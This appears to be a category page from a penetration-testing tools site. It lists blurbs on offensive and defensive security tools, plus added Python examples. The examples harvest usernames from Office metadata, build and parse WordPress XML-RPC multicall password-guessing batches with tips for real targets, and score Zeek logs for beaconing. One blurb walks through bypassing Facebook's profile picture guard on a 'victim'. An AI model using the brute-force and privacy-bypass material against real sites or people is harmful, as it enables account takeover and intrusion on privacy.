Browsing category

Pentest

FOCA – Find Metadata And Hidden Information In The Documents

FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analysed with FOCA. It is capable of analysing a wide variety of documents, with the most common being Microsoft Office, […]
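To make concrete what "metadata and hidden information" means for an Office document, here is an added example (my code, not FOCA's) that opens an OOXML file (.docx, .xlsx, .pptx) as the ZIP archive it is, reads docProps/core.xml and docProps/app.xml, and pulls out the author, last-modified-by, application, company and timestamp fields that this kind of reconnaissance turns into usernames, Windows domain names and software-version leads. The sample document is constructed in memory and every name and value in it is made up.

```python
import io
import zipfile
from xml.etree import ElementTree as ET

# XML namespaces used by OOXML document properties.
CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Fields worth harvesting: who made the file, who touched it last, when, and with what.
CORE_FIELDS = {
    "title": "dc:title",
    "creator": "dc:creator",
    "last_modified_by": "cp:lastModifiedBy",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
}
APP_FIELDS = ("Application", "Company", "Template")


def extract_ooxml_metadata(data: bytes) -> dict:
    """Return the document-property metadata of a .docx/.xlsx/.pptx given as bytes."""
    meta = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(zf.read("docProps/core.xml"))
            for key, path in CORE_FIELDS.items():
                el = root.find(path, CORE_NS)
                if el is not None and el.text:
                    meta[key] = el.text.strip()
        if "docProps/app.xml" in names:
            root = ET.fromstring(zf.read("docProps/app.xml"))
            for tag in APP_FIELDS:
                el = root.find(f"{{{APP_NS}}}{tag}")
                if el is not None and el.text:
                    meta[tag.lower()] = el.text.strip()
    return meta


def harvest_identities(meta: dict) -> set:
    """Turn author fields into (domain, user) pairs; a 'CORP\\jdoe' style value
    leaks the Windows domain as well as the account name."""
    found = set()
    for key in ("creator", "last_modified_by"):
        value = meta.get(key)
        if value:
            domain, _, user = value.rpartition("\\")
            found.add((domain, user))
    return found


# Constructed sample: a minimal .docx whose property values are made up.
CORE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
 xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <dc:title>Q3 network diagram</dc:title>
 <dc:creator>jdoe</dc:creator>
 <cp:lastModifiedBy>CORP\\admin.smith</cp:lastModifiedBy>
 <dcterms:created xsi:type="dcterms:W3CDTF">2019-08-02T09:14:00Z</dcterms:created>
 <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-11T16:03:00Z</dcterms:modified>
</cp:coreProperties>"""

APP_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
 <Application>Microsoft Office Word</Application>
 <Company>Example Corp</Company>
 <Template>Normal.dotm</Template>
</Properties>"""


def build_sample_docx() -> bytes:
    """Assemble the constructed sample document in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("docProps/core.xml", CORE_XML)
        zf.writestr("docProps/app.xml", APP_XML)
        zf.writestr("word/document.xml",
                    "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
    return buf.getvalue()


if __name__ == "__main__":
    meta = extract_ooxml_metadata(build_sample_docx())
    for key, value in meta.items():
        print(f"{key:18} {value}")
    print("identities:", harvest_identities(meta))
```

The same approach works on any file a crawler pulls off a target's web server; the defensive counterpart is to strip docProps before publishing (Office's Document Inspector does this), since nothing in the document body needs those fields.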

Password Lense – Reveal Character Types In A Password

  What is this? Certain characters in passwords (‘O’ and ‘0’, ‘I’ and ‘l’, etc.) can be hard to identify when you need to type them in (and copy-paste is unavailable). Password Lense is a small web application that provides a quick and secure way to get a more informative view of your password. Features […]

Snare – Super Next Generation Advanced Reactive honEypot

SNARE (Super Next generation Advanced Reactive honEypot) is a web application honeypot sensor attracting all sorts of maliciousness from the Internet. Documentation: the documentation can be found here. Basic concepts: surface first, i.e. focus on attack surface generation; sensors and masters, i.e. lightweight collectors (SNARE) and […]

UAC-A-Mola – Detecting And Exploiting New and Known UAC Bypasses

UAC-A-Mola is a tool that allows security researchers to investigate new UAC bypasses, in addition to detecting and exploiting known bypasses. It also has modules to carry out the protection and mitigation of UAC bypasses. The strong point of UAC-A-Mola is that it was created so that other researchers can carry out the work and process […]

How to Install CentOS 7/8 on VMware Workstation 15

CentOS, which stands for Community Enterprise Operating System, is one of the most widely used Linux distributions available for free. It powers many web servers across the globe. It is based on Red Hat Enterprise Linux (RHEL), but note that even though it is based on RHEL, it is not RHEL. It […]

How to Bypass Facebook Profile Picture Guard

Hey guys, in this video I show you how to bypass Facebook Profile Picture Guard. Open the victim's profile, then right-click on the page and click View Page Source. Now search for entity_id by pressing Ctrl+F; note that it is nothing but the victim's profile ID in numeric form. Note down the ID […]

Rbuster – Yet Another Dirbuster

  yet another dirbuster Common Command line options -a <user agent string> – specify a user agent string to send in the request -c <http cookies> – use this to specify any cookies that you might need (simulating auth). header. -f – force processing of a domain with wildcard results. -l – show the length […]

XMLRPC Bruteforcer – An XMLRPC Brute Forcer Targeting WordPress

An XML-RPC brute forcer targeting WordPress, written in Python 3. In the context of XML-RPC brute forcing, it is faster than Hydra and WPScan: it can brute force 1000 passwords per second. Usage: python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username, or python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt. Bugs: if you get an xml.etree.ElementTree.ParseError: Did you forget to add ‘xmlrpc’ […]
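The reason an XML-RPC guesser can outrun tools that send one HTTP request per password is the system.multicall method, which lets a single request carry a batch of authenticated calls. The excerpt above does not name the method, so the following is an added example of mine, not the tool's code: it packs one wp.getUsersBlogs attempt per password into a multicall body, then maps the results of a constructed response back to the guesses, treating a fault struct as a rejection and anything else as a valid login. It also turns the ParseError the excerpt mentions into a readable error, since a non-XML body almost always means the URL is wrong. The username, guesses and response are all constructed; nothing here talks to a network.

```python
import xmlrpc.client
from xml.parsers import expat

# Constructed inputs (not captured from any real target).
USERNAME = "admin"
GUESSES = ["winter2019", "Password1", "correct-horse"]


def build_multicall(username, passwords):
    """Pack one wp.getUsersBlogs login attempt per password into a single
    system.multicall request body. One HTTP round trip then carries the whole
    batch, which is what makes multicall guessing faster than one request per
    password."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def find_valid_passwords(response_xml, passwords):
    """Map each multicall result back to the password that produced it.

    A rejected login comes back as a fault struct (faultCode/faultString); a
    success comes back as a one-element array holding wp.getUsersBlogs'
    return value. A non-XML body (HTML error page, wrong URL) is reported
    instead of surfacing as a bare ParseError."""
    try:
        params, _method = xmlrpc.client.loads(response_xml)
    except expat.ExpatError as exc:
        raise ValueError("response is not XML; check the endpoint URL "
                         "(did you forget xmlrpc.php?)") from exc
    if not params or not isinstance(params[0], list):
        raise ValueError("not a system.multicall response")
    results = params[0]
    if len(results) != len(passwords):
        raise ValueError("result count does not match the number of guesses")
    valid = []
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # login rejected for this guess
        valid.append(pw)
    return valid


# Constructed response: two rejections, then a success for the third guess.
SAMPLE_RESPONSE = xmlrpc.client.dumps(([
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    [[{"isAdmin": True, "blogid": "1", "blogName": "demo",
       "url": "http://wordpress.example/",
       "xmlrpc": "http://wordpress.example/xmlrpc.php"}]],
],), methodresponse=True)


if __name__ == "__main__":
    print(build_multicall(USERNAME, GUESSES))
    print("valid:", find_valid_passwords(SAMPLE_RESPONSE, GUESSES))
```

One caveat when using this against a real site: WordPress since 4.4 stops authenticating for the rest of a multicall once one call in it fails, so on a current install every guess after the first wrong one returns a fault whether or not it was correct. Treat an all-fault batch as inconclusive rather than as proof that every password in it was wrong, and expect the quoted 1000 guesses per second only on targets that still honour the whole batch.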

Dirstalk – Modern Alternative To Dirbuster/Dirb

Dirstalk is a multithreaded application designed to brute force paths on web servers. The tool contains functionality similar to that offered by dirbuster and dirb. How to use it: the application is self-documenting; launching dirstalk -h will return all the available commands with a short […]

Cotopaxi – Tools For Security Testing Of Internet Of Things Devices

Set of tools for security testing of Internet of Things devices using protocols like CoAP, DTLS, HTCPCP, mDNS, MQTT and SSDP. Installation: simply clone the code from git: https://github.com/Samsung/cotopaxi. Requirements: currently Cotopaxi works only with Python 2.7.x, but future versions will also work with Python 3. If you have a previous installation of scapy without scapy-ssl_tls, please remove it or […]

Auto Re – IDA PRO Auto-Renaming Plugin With Tagging Support

IDA Pro auto-renaming plugin with tagging support. Features: 1. Auto-renaming of dummy-named functions which have one API call or a jump to the imported API. 2. Assigning tags to functions according to the API indicators called inside; tags are set as repeatable function comments and the tag tree is displayed in a separate view. […]

RITA – Real Intelligence Threat Analytics

RITA is an open source framework for network traffic analysis. The framework ingests Bro/Zeek logs in TSV format, and currently supports the following major features. Beaconing detection: search for signs of beaconing behavior in and out of your network. DNS tunneling detection: search for signs of DNS-based covert channels. Blacklist checking: query blacklists […]
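Beaconing detection rests on regularity: an implant checking in with its command server tends to contact the same destination at near-constant intervals with near-constant request sizes, while human-driven traffic is bursty in both. As an added example (my code, not RITA's, and not RITA's actual scoring), the Python below parses a constructed Zeek conn.log excerpt in TSV form, groups connections by source/destination pair, and scores each pair by how tightly its connection intervals and originator byte counts cluster around their medians, with 1.0 meaning perfectly regular. The column subset, the scoring formula and every log line are my own; RITA's real analysis uses more of the log and a richer model.

```python
import statistics
from collections import defaultdict

# Constructed Zeek conn.log excerpt (TSV, reduced to the columns used here).
# 10.0.0.5 -> 203.0.113.7: 12 connections roughly every 60 s, 512 bytes each (beacon-like).
# 10.0.0.8 -> 198.51.100.20: 7 connections at irregular times and sizes (browsing-like).
# 10.0.0.5 -> 192.0.2.10: only 2 connections, too few to judge.
SAMPLE_CONN_LOG = "\n".join([
    "#separator \\x09",
    "#path\tconn",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\torig_bytes",
    "1568211600.0\tC1\t10.0.0.5\t49152\t203.0.113.7\t443\ttcp\t512",
    "1568211660.0\tC2\t10.0.0.5\t49153\t203.0.113.7\t443\ttcp\t512",
    "1568211720.4\tC3\t10.0.0.5\t49154\t203.0.113.7\t443\ttcp\t512",
    "1568211780.0\tC4\t10.0.0.5\t49155\t203.0.113.7\t443\ttcp\t512",
    "1568211840.2\tC5\t10.0.0.5\t49156\t203.0.113.7\t443\ttcp\t512",
    "1568211900.0\tC6\t10.0.0.5\t49157\t203.0.113.7\t443\ttcp\t512",
    "1568211960.0\tC7\t10.0.0.5\t49158\t203.0.113.7\t443\ttcp\t512",
    "1568212020.3\tC8\t10.0.0.5\t49159\t203.0.113.7\t443\ttcp\t512",
    "1568212080.0\tC9\t10.0.0.5\t49160\t203.0.113.7\t443\ttcp\t512",
    "1568212140.1\tC10\t10.0.0.5\t49161\t203.0.113.7\t443\ttcp\t512",
    "1568212200.0\tC11\t10.0.0.5\t49162\t203.0.113.7\t443\ttcp\t512",
    "1568212260.0\tC12\t10.0.0.5\t49163\t203.0.113.7\t443\ttcp\t512",
    "1568211601.2\tC13\t10.0.0.8\t50001\t198.51.100.20\t443\ttcp\t1480",
    "1568211604.9\tC14\t10.0.0.8\t50002\t198.51.100.20\t443\ttcp\t2200",
    "1568211790.3\tC15\t10.0.0.8\t50003\t198.51.100.20\t443\ttcp\t512",
    "1568211802.0\tC16\t10.0.0.8\t50004\t198.51.100.20\t443\ttcp\t9100",
    "1568212500.7\tC17\t10.0.0.8\t50005\t198.51.100.20\t443\ttcp\t300",
    "1568212503.1\tC18\t10.0.0.8\t50006\t198.51.100.20\t443\ttcp\t1480",
    "1568212601.5\tC19\t10.0.0.8\t50007\t198.51.100.20\t443\ttcp\t4020",
    "1568211650.0\tC20\t10.0.0.5\t49200\t192.0.2.10\t80\ttcp\t-",
    "1568212310.0\tC21\t10.0.0.5\t49201\t192.0.2.10\t80\ttcp\t-",
])


def parse_zeek_tsv(text):
    """Parse Zeek TSV output into dicts; the #fields header names the columns."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields is not None:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def _regularity(values):
    """1.0 when all values are identical, falling towards 0 as the median
    absolute deviation approaches the median itself."""
    median = statistics.median(values)
    if median <= 0:
        return 0.0
    mad = statistics.median(abs(v - median) for v in values)
    return max(0.0, 1.0 - mad / median)


def beacon_scores(conn_log_text, min_connections=6):
    """Score every (orig_h, resp_h) pair with at least min_connections
    connections; higher means more beacon-like."""
    by_pair = defaultdict(list)
    for row in parse_zeek_tsv(conn_log_text):
        size = 0 if row["orig_bytes"] == "-" else int(row["orig_bytes"])
        by_pair[(row["id.orig_h"], row["id.resp_h"])].append((float(row["ts"]), size))
    scores = {}
    for pair, conns in by_pair.items():
        if len(conns) < min_connections:
            continue
        conns.sort()
        ts = [t for t, _ in conns]
        intervals = [b - a for a, b in zip(ts, ts[1:])]
        sizes = [s for _, s in conns]
        scores[pair] = round((_regularity(intervals) + _regularity(sizes)) / 2, 3)
    return scores


if __name__ == "__main__":
    for pair, score in sorted(beacon_scores(SAMPLE_CONN_LOG).items(),
                              key=lambda kv: kv[1], reverse=True):
        print(f"{score:.3f}  {pair[0]} -> {pair[1]}")
```

The min_connections floor matters in practice: with two or three connections almost any pair looks "regular", so a detector that skips it drowns analysts in false positives. Jittered beacons defeat the interval half of this score but not the size half, which is one reason to score several independent features rather than one.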

Eaphammer – Evil Twin Attacks Against WPA2-Enterprise Networks

  by Gabriel Ryan (s0lst1c3)(gryan[at]specterops.io) EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual […]

Postenum – Tool For Basic/Advanced Privilege Escalation Techniques

Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum is intended to be executed locally on a Linux box. Be more than a normal user: be root. Usage: ./postenum.sh [option], e.g. ./postenum.sh -s or ./postenum.sh -c. Options: -a : all; -s : filesystem [SUID, SGID, config/DB files, etc.] […]

Unicorn-Bios – Basic BIOS Emulator For Unicorn Engine

Basic BIOS emulator/debugger for Unicorn Engine, written to debug the XEOS operating system boot sequence. Usage: unicorn-bios [OPTIONS] BOOT_IMG. Options: --help / -h: displays help. --memory / -m: the amount of memory to allocate for the virtual machine (in megabytes); defaults to 64MB, minimum 2MB. --break / -b: breaks on a specific address. […]

uniFuzzer – Fuzzing Tool Based On Unicorn And LibFuzzer

uniFuzzer is a fuzzing tool for closed-source binaries based on Unicorn and LibFuzzer. Currently it supports fuzzing 32-bit LSB ELF files on ARM/MIPS, which are usually seen in IoT devices. Features: very little hacking needed and easy to build; can target any specified function or code snippet; coverage-guided fuzzing with considerable speed; dependencies resolved and […]

Tylium – Data for Intrusion Detection, Security Analytics and Threat Hunting

These files contain configuration for producing EDR (endpoint detection and response) data in addition to standard system logs. These configurations enable the production of these data streams using F/OSS (free and/or open source) tooling. The F/OSS tools consist of Auditd for Linux, Sysmon for Windows and Xnumon for the Mac. Also included […]

DECAF – Short for Dynamic Executable Code Analysis Framework

In DECAF++, the new version of DECAF, taint analysis is around 2x faster, making it, to the best of our knowledge, the fastest whole-system dynamic taint analysis framework. This results in much better usability, imposing only 4% overhead (SPEC CPU2006) when no suspicious (tainted) input exists. Even under heavy taint analysis workloads, DECAF++ has […]